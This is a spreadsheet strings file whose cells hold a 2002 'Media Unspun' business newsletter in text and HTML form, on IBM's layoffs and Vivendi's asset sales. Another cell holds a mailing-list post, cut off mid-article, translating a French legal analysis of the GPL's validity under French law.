   EXIT INSTRUCTIONS: 
   To Be EXTRACTED From Future Mailings: 
   mailto:kislinger987@eudoramail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SEC Exposes Big Blue's Pink Slips
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1029331990-31627-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000018970.cfm
 M E D I A  U N S P U N
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 August 14, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * SEC EXPOSES BIG BLUE'S PINK SLIPS
 * SYNERGY AND BETRAYAL AT VIVENDI
 * OTHER STORIES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ADVERTISEMENT
 -----------------------------------------------------------------
 Ken Fisher offers his Quarterly Report for high net worth
 investors FREE of cost &amp; without obligation. Access the same
 investment research he uses to guide his clients at:
 http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000
 -----------------------------------------------------------------
 SEC EXPOSES BIG BLUE'S PINK SLIPS
 -----------------------------------------------------------------
 Does the Securities and Exchange Commission have a press pass
 yet? It seems to be bringing us all our news lately. On the day
 of the deadline for companies to certify their financial
 statements with the SEC, the business press squirmed and waited
 for the next Enron or WorldCom. (We might eat these words
 tomorrow, but we doubt it.) In an unrelated confession, IBM gave 
 the commission its latest layoff numbers.
 IBM talked about pink slips during its second-quarter earnings
 report, but with a vagueness worthy of your daily horoscope.
 ("Capricorn: Career changes may be on their way...") Only after
 "months of surreptitious layoff notices" did the company admit
 that it's cutting more than 15,600 jobs, said the AP. That's
 about 5% of its workforce, and a lot more than pundits expected. 
 An IBM spokesperson told the Wall Street Journal the higher
 number was due to "rebalancing" and more employees than expected 
 taking voluntary layoffs. 
 Sorry, we're still back on "rebalancing." Did IBM "rightsize"
 last quarter, too?
 IBM's news was still trickling out Wednesday morning, but some
 details were available. About 1,400 workers got cut from IBM's
 microelectronics unit, and most of the rest were from IT
 services and consulting. (That ought to make IBM's new employees 
 from PricewaterhouseCoopers feel all warm and fuzzy inside.)
 Look for news updates from cities that will see the cuts, such
 as Austin and Raleigh. 
 OK, none of this is good. Two years into the tech slump, we're
 still tired of seeing people get sacked. But was it really so
 bad that IBM only revealed it because of new accounting
 regulations? Nah, Big Blue was always known for "stealth
 layoffs," as CNN put it, but current corporate scrutiny forced
 it to 'fess up for once. Until now, IBM would acknowledge the
 latest layoffs if reporters called and asked, but wouldn't give
 specifics. Yeesh. - Jen Muehlbauer
 IBM Cut 5% of Staff in Period, Double the Expected Number
 http://online.wsj.com/article/0,,SB1029282408667791835,00.html
 (Paid subscription required.) 
 IBM to Cut Over 15,000 Employees (AP)
 http://tinyurl.com/10kz
 IBM confirms 15,600 job cuts (Reuters)
 http://www.msnbc.com/news/793777.asp 
 IBM cutting 15,000 jobs 
 http://news.com.com/2100-1001-949677.html
 IBM job cuts exceed 15,600
 http://money.cnn.com/2002/08/13/technology/ibm/index.htm
 IBM puts job cuts at 15,600, with fewer than 50 in this state
 http://seattlepi.nwsource.com/business/82508_ibm14.shtml
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 You've heard about identity management, but do you know about
 the opportunities and business models that will emerge as a
 result? Download a free executive summary of Esther Dyson's coverage of
 identity management in Release 1.0. Learn more about the
 expanding market for these services and applications.
 http://release1.edventure.com/executivesummary.cfm?MCode=Unspun
 -----------------------------------------------------------------
 SYNERGY AND BETRAYAL AT VIVENDI
 -----------------------------------------------------------------
 Synergy always was a fuzzy concept. Now Vivendi Universal's top
 man has slammed the lid on it. The French company announced
 today that it's ready to peddle $9.8 billion in assets to rustle 
 up some cash. First up on the block? Synergy-less U.S. book
 publisher Houghton Mifflin. 
 It's unclear whether new chairman Jean-Rene Fourtou has genuine
 turnaround muscle, or whether he and Vivendi's board are simply
 following the winds of post-merger fashion. But when you owe
 $18.7 billion, you get real practical, real fast. The Guardian
 reported that Vivendi's share price sank 5% on Tuesday when
 investors got the willies about the company's impending
 announcement on its financial health. But the company had
 positive news to report: It's making money. Revenue in the first 
 half was up 13%, higher than analysts' estimates of a 7.7%
 boost. 
 Details are scant on the breadth of Fourtou's restructuring
 efforts, with more information expected at the next board
 meeting on September 25, according to reporters. Houghton
 Mifflin, acquired a year ago for $1.7 billion, and a vague
 explanation that included the "Curious George" character, were
 the only properties named for sale so far. The Guardian
 speculated that Vivendi will also sell its U.S. video games
 business and possibly its stake in the French mobile phone
 company SFR, a debatable sale because of the cash it generates,
 according to the newspaper. 
 Meanwhile, Fourtou's predecessor, Jean-Marie Messier, continues
 to advocate empire-building. The New York Post said its sources
 say Messier hopes his former employer will feel generous enough
 to let him continue to reside in his $17 million Manhattan
 abode. And Bloomberg reported earlier this week that an
 unrepentant Messier is penning a memoir as he vacations in the
 Mediterranean. The working title? "How I Was Betrayed."  -
 Deborah Asbrand 
 Vivendi to Sell Publisher Houghton Mifflin (Reuters)
 http://www.washingtonpost.com/wp-dyn/articles/A15954-2002Aug14.html
 Vivendi investors expect the worst
 http://www.guardian.co.uk/business/story/0,3604,774190,00.html
 Vivendi to Sell $9.8 Billion In Assets, Including Houghton
 http://online.wsj.com/article/0,,SB102931297119161715,00.html
 (Paid subscription required.) 
 Ousted Messier Aims To Score $17m Vivendi Pad
 http://www.nypost.com/business/54701.htm
 Ex-Chief of Vivendi Plans Tell-All Book (Bloomberg)
 http://www.nytimes.com/2002/08/12/business/media/12VIVE.html
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 A Top AOL Manager Has Left Company
 http://www.nytimes.com/2002/08/14/technology/14AOL.html
 Fed Holds Steady on Interest Rates 
 http://www.washingtonpost.com/wp-dyn/articles/A14636-2002Aug13.html
 Amtrak halts all high-speed service after finding cracks
 http://www.sunspot.net/bal-te.train14aug14.story
 AOL lets resigning exec keep stock options 
 http://www.usatoday.com/money/industries/technology/2002-08-13-aol-pittman_x.htm
 Lucent licensing deal with Winstar focus of probe (AP)
 http://www.bayarea.com/mld/mercurynews/business/3861117.htm
 Study Says Net Could Benefit Music Firms
 http://www.latimes.com/business/la-fi-music14aug14.story
 Eisner Crimping His Own Style
 http://www.latimes.com/business/la-fi-disney14aug14.story
 Severance claims by Enron former execs anger ex-workers
 http://www.chron.com/cs/CDA/story.hts/business/1533657
 Princeton removes dean after Yale Web site flap (AP)
 http://www.siliconvalley.com/mld/siliconvalley/3857890.htm
 Frisbee golf creator dies, may land on someone's roof (SF
 Chronicle)
 http://seattlepi.nwsource.com/national/82560_frisbee14.shtml
 Will Kinsley's Slate Get Wiped?
 http://www.ojr.org/ojr/kramer/1029281360.php
 Hollywood, Russian Bicker Over Bass
 http://www.cnn.com/2002/SHOWBIZ/News/08/13/bassspace.hollywood.ap/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Marketing: Cowpoke Productions (cowpokeproductions.com).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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com
 ------------=_1029331990-31627-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;M E D I A  U N S P U N&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt
 **********************************************************
 CREATED: August 14, 2002   
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="ALL"&gt;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.a226814927149384-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927149384-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927149384-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927149384-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927149384-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927149384-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927149384-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927149384-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a226814927144888-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927144888-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927144888-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a226814927144469-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927144469-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927144469-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a226814927151492-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a226814927151492-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927151492-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927151492-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a226814927151492-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927151492-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a226814927151492-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a226814927151492-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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 &lt;table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000018970.cfm&amp;XXDESXXissue_id=18970&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a226814927149384-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/081402092715/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="M E D I A  U N S P U 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Wednesday, August 14, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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HREF="#a87727"
 						class="a226814927144888-contents_article_title"
 				&gt;
 			SEC Exposes Big Blue's Pink Slips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HREF="#a87728"
 						class="a226814927144469-contents_article_title"
 				&gt;
 			Synergy and Betrayal at Vivendi
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		 &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a87730"
 						class="a226814927144469-contents_article_title"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&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Media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&lt;P&gt;Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at:&lt;br&gt;
 &lt;A HREF="http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000"&gt;http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000&lt;/A&gt;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name="a87727"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			SEC Exposes Big Blue's Pink Slips
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Does the Securities and Exchange Commission have a press pass yet? It seems to be bringing us all our news lately. On the day of the deadline for companies to certify their financial statements with the SEC, the business press squirmed and waited for the next Enron or WorldCom. (We might eat these words tomorrow, but we doubt it.) In an unrelated confession, IBM gave the commission its latest layoff numbers.&lt;/P&gt;&lt;P&gt;
 IBM talked about pink slips during its second-quarter earnings report, but with a vagueness worthy of your daily horoscope. ("Capricorn: Career changes may be on their way...") Only after "months of surreptitious layoff notices" did the company admit that it's cutting more than 15,600 jobs, said the AP. That's about 5% of its workforce, and a lot more than pundits expected. An IBM spokesperson told the Wall Street Journal the higher number was due to "rebalancing" and more employees than
 expected taking voluntary layoffs. &lt;/P&gt;&lt;P&gt;
 Sorry, we're still back on "rebalancing." Did IBM "rightsize" last quarter, too?&lt;/P&gt;&lt;P&gt;
 IBM's news was still trickling out Wednesday morning, but some details were available. About 1,400 workers got cut from IBM's microelectronics unit, and most of the rest were from IT services and consulting. (That ought to make IBM's new employees from PricewaterhouseCoopers feel all warm and fuzzy inside.) Look for news updates from cities that will see the cuts, such as Austin and Raleigh. &lt;/P&gt;&lt;P&gt;
 OK, none of this is good. Two years into the tech slump, we're still tired of seeing people get sacked. But was it really so bad that IBM only revealed it because of new accounting regulations? Nah, Big Blue was always known for "stealth layoffs," as CNN put it, but current corporate scrutiny forced it to 'fess up for once. Until now, IBM would acknowledge the latest layoffs if reporters called and asked, but wouldn't give specifics. Yeesh. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 IBM Cut 5% of Staff in Period, Double the Expected Number&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1029282408667791835,00.html"&gt;http://online.wsj.com/article/0,,SB1029282408667791835,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.) &lt;/P&gt;&lt;P&gt;
 IBM to Cut Over 15,000 Employees (AP)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/10kz"&gt;http://tinyurl.com/10kz&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 IBM confirms 15,600 job cuts (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/793777.asp"&gt;http://www.msnbc.com/news/793777.asp&lt;/A&gt;  &lt;/P&gt;&lt;P&gt;
 IBM cutting 15,000 jobs &lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1001-949677.html"&gt;http://news.com.com/2100-1001-949677.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 IBM job cuts exceed 15,600&lt;br&gt;
 &lt;A HREF="http://money.cnn.com/2002/08/13/technology/ibm/index.htm"&gt;http://money.cnn.com/2002/08/13/technology/ibm/index.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 IBM puts job cuts at 15,600, with fewer than 50 in this state&lt;br&gt;
 &lt;A HREF="http://seattlepi.nwsource.com/business/82508_ibm14.shtml"&gt;http://seattlepi.nwsource.com/business/82508_ibm14.shtml&lt;/A&gt; &lt;/P&gt;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You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? &lt;a href="http://release1.edventure.com/executivesummary.cfm?MCode=Unspun"&gt;Download&lt;/a&gt; a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications.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name="a87728"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Synergy and Betrayal at Vivendi
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Synergy always was a fuzzy concept. Now Vivendi Universal's top man has slammed the lid on it. The French company announced today that it's ready to peddle $9.8 billion in assets to rustle up some cash. First up on the block? Synergy-less U.S. book publisher Houghton Mifflin. &lt;/P&gt;&lt;P&gt;
 It's unclear whether new chairman Jean-Rene Fourtou has genuine turnaround muscle, or whether he and Vivendi's board are simply following the winds of post-merger fashion. But when you owe $18.7 billion, you get real practical, real fast. The Guardian reported that Vivendi's share price sank 5% on Tuesday when investors got the willies about the company's impending announcement on its financial health. But the company had positive news to report: It's making money. Revenue in the first half was 
 up 13%, higher than analysts' estimates of a 7.7% boost. &lt;/P&gt;&lt;P&gt;
 Details are scant on the breadth of Fourtou's restructuring efforts, with more information expected at the next board meeting on September 25, according to reporters. Houghton Mifflin, acquired a year ago for $1.7 billion, and a vague explanation that included the "Curious George" character, were the only properties named for sale so far. The Guardian speculated that Vivendi will also sell its U.S. video games business and possibly its stake in the French mobile phone company SFR, a debatable
 sale because of the cash it generates, according to the newspaper. &lt;/P&gt;&lt;P&gt;
 Meanwhile, Fourtou's predecessor, Jean-Marie Messier, continues to advocate empire-building. The New York Post said its sources say Messier hopes his former employer will feel generous enough to let him continue to reside in his $17 million Manhattan abode. And Bloomberg reported earlier this week that an unrepentant Messier is penning a memoir as he vacations in the Mediterranean. The working title? "How I Was Betrayed."  - Deborah Asbrand &lt;/P&gt;&lt;P&gt;
 Vivendi to Sell Publisher Houghton Mifflin (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A15954-2002Aug14.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A15954-2002Aug14.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi investors expect the worst&lt;br&gt;
 &lt;A HREF="http://www.guardian.co.uk/business/story/0,3604,774190,00.html"&gt;http://www.guardian.co.uk/business/story/0,3604,774190,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi to Sell $9.8 Billion In Assets, Including Houghton&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB102931297119161715,00.html"&gt;http://online.wsj.com/article/0,,SB102931297119161715,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.) &lt;/P&gt;&lt;P&gt;
 Ousted Messier Aims To Score $17m Vivendi Pad&lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/54701.htm"&gt;http://www.nypost.com/business/54701.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Ex-Chief of Vivendi Plans Tell-All Book (Bloomberg)&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/business/media/12VIVE.html"&gt;http://www.nytimes.com/2002/08/12/business/media/12VIVE.html&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		 &lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	 &lt;a name="a87730"&gt;&lt;/a&gt;   
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;A Top AOL Manager Has Left Company&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/14/technology/14AOL.html"&gt;http://www.nytimes.com/2002/08/14/technology/14AOL.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Fed Holds Steady on Interest Rates &lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A14636-2002Aug13.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A14636-2002Aug13.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Amtrak halts all high-speed service after finding cracks&lt;br&gt;
 &lt;A HREF="http://www.sunspot.net/bal-te.train14aug14.story"&gt;http://www.sunspot.net/bal-te.train14aug14.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 AOL lets resigning exec keep stock options &lt;br&gt;
 &lt;A HREF="http://www.usatoday.com/money/industries/technology/2002-08-13-aol-pittman_x.htm"&gt;http://www.usatoday.com/money/industries/technology/2002-08-13-aol-pittman_x.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Lucent licensing deal with Winstar focus of probe (AP)&lt;br&gt;
 &lt;A HREF="http://www.bayarea.com/mld/mercurynews/business/3861117.htm"&gt;http://www.bayarea.com/mld/mercurynews/business/3861117.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Study Says Net Could Benefit Music Firms&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-music14aug14.story"&gt;http://www.latimes.com/business/la-fi-music14aug14.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Eisner Crimping His Own Style&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-disney14aug14.story"&gt;http://www.latimes.com/business/la-fi-disney14aug14.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;
 Severance claims by Enron former execs anger ex-workers&lt;br&gt;
 &lt;A HREF="http://www.chron.com/cs/CDA/story.hts/business/1533657"&gt;http://www.chron.com/cs/CDA/story.hts/business/1533657&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Princeton removes dean after Yale Web site flap (AP)&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/3857890.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/3857890.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Frisbee golf creator dies, may land on someone's roof (SF Chronicle)&lt;br&gt;
 &lt;A HREF="http://seattlepi.nwsource.com/national/82560_frisbee14.shtml"&gt;http://seattlepi.nwsource.com/national/82560_frisbee14.shtml&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Will Kinsley's Slate Get Wiped?&lt;br&gt;
 &lt;A HREF="http://www.ojr.org/ojr/kramer/1029281360.php"&gt;http://www.ojr.org/ojr/kramer/1029281360.php&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Hollywood, Russian Bicker Over Bass&lt;br&gt;
 &lt;A HREF="http://www.cnn.com/2002/SHOWBIZ/News/08/13/bassspace.hollywood.ap/"&gt;http://www.cnn.com/2002/SHOWBIZ/News/08/13/bassspace.hollywood.ap/&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000018970.cfm"&gt;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COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;table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000018970.cfm&amp;XXDESXXissue_id=18970&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a226814927151492-footer_tellafriend"&gt;
 			&lt;font size=4&gt;TELL A FRIEND&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@example.com &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E178767,5114587XXmediaunspunXX18970XXXXindex000018970.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1029331990-31627-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I have translated the article in full - see 
 end of post (I think that I've done a far 
 better job than the Google translation - at 
 least it's readable now - any corrections
 appreciated).
 Stuff in {}'s is my (and others) additions 
 to the debate.
 My apologies if I've paraphrased anybody 
 incorrectly, I will be glad to retract if 
 anyone is miffed.
 The article makes four main points.
 1) Absence of critical clauses. 
 In this case, the idea is that the licence 
 is invalid because it doesn't specify
 under what country's law the GPL is governed.
 2) Specification in English only.
 That for the end user (as opposed to businesses), 
 the GPL doesn't apply because it's not written 
 in French.
 3) Arbitary licence change.
 The point here is that (under French law) the 
 author can change the terms of the licence 
 arbitarily. This is because any granting of 
 rights by an author must be clearly delimited
 in terms of how long, where, to whom, dates and 
 times. In the absence of such limitations, the 
 original author has the right to change his 
 software back to closed on a whim.
 {
 David Neary makes the point that the copyright 
 holder automatically retains the right to change 
 the licence.
 Scott replies it simply requires authorisation from 
 all *copyright holders*
 That's not my understanding. French law allows a 
 GPL type licence *_on condition_* that the 
 specific conditions of the granting of such
 rights are clear - if they are not, there is
 nothing to stop the original author taking
 back "his work". The lawyers see this
 (correctly IMHO) as a weakness in the GPL).
 }
 4) Hidden defects.
 Roughly, this clause means that the author(s) 
 is/are liable for any defects if the consumer 
 is not an IT engineer, so if Linux blows up 
 and data is lost, then the authors are liable.
 {
 Ciaran Johnson says that M$oft and others have 
 similar clauses - the point here is that they 
 are *_all_* invalid - just that this one 
 affects the GPL also.
 Niall O'Broinn makes the point that it is not
 a sale, but rather a service/leasing arrangement
 and that's why it doesn't come under this point.
 I would suggest that the whole thrust of this
 article has been to see software "sales" (even
 if no money changes hands) as governed very
 much by consumer law (in France anyway).
 Rick Moen makes the point that it is not
 a sale but rather a granting of rights which
 are not default. 
 See the bit about even the granting of 
 rights by an author having to be 
 explicitly specified - under French law.
 The fact that two IP lawyers in France think that
 the GPL is covered as a sale make me feel that 
 there is a de facto sale and a de facto contract.
 }
 5) Roughly.
 There may be other reasons under French 
 law why the  GPL may be invalid.
 -----  Whole Article. -----------
 Freedom(a) is worth more than these 
 imperfect licences.
 Specialised lawyers look at the GPL.
 Lawyer Cyril Rojinsky (duly appointed to 
 the court) and the jurist Vincent Grynbaum, both 
 specialised in the area of intellectual property 
 examine the "free" licences and in particular the 
 GPL. They have published their study
 in the review "Proprietes intellectuelles 
 (Intellectual property)[1]" and their
 conclusion is grim.
 Their approach is interesting. The problem for 
 them is not to know whether freedom is valid under 
 French law (for them the question is a moot point)
 but rather they asked themselves about the form 
 and the content of the text of free licences, and 
 in particular the GPL. The problem is not free 
 programmes, but rather the licence contracts of 
 free programmes.
 Absence of critical clauses.
 The authors tell us that first of all, the 
